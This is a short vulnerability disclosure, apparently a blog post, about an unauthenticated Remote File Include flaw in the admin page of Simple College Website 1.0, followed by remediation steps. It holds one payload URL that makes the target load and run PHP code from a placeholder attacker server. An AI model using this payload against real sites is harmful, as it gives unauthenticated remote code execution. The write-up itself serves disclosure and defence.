Simple College Website 1.0 — RFI

Simple College Website 1.0 is vulnerable to a Remote File Include (RFI) attack. User input could be passed into file include commands and…

Simple College Website 1.0 is vulnerable to a Remote File Include (RFI) attack. User input could be passed into file include commands and the web application could be tricked into including remote files with malicious code. Attacker can execute commands without authenticating into the system.

Vendor Homepage: https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html

Source Code: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-college-website.zip


Root cause Analysis and Hacking

Let’s look at the source code which caused the RFI.

/admin/index.php

line 72 uses “include” expression to include the php. We could clearly see that there is no input validation or sanitisation. Hence, we can include Remote php files and execute it on the target.

Payload:

http://<target>/college_website/admin/index.php?page=http://<our_server>/exploit

Condition:

  1. To allow inclusion of remote files, the directive allow_url_include must be set to On in php.ini

We can create a local python simple HTTP server and server the remote php file for exploitation.

exploit.php
Burp Req/Res

There is no need for authentication to get the RFI and execute remote code. Hence, it is an unauthenticated RFI.

Remediation

  1. Authentication of requests made by the user.
  2. Checking for file location when including it.
  3. disabling allow_url_include
  4. Input sanitisation and validation.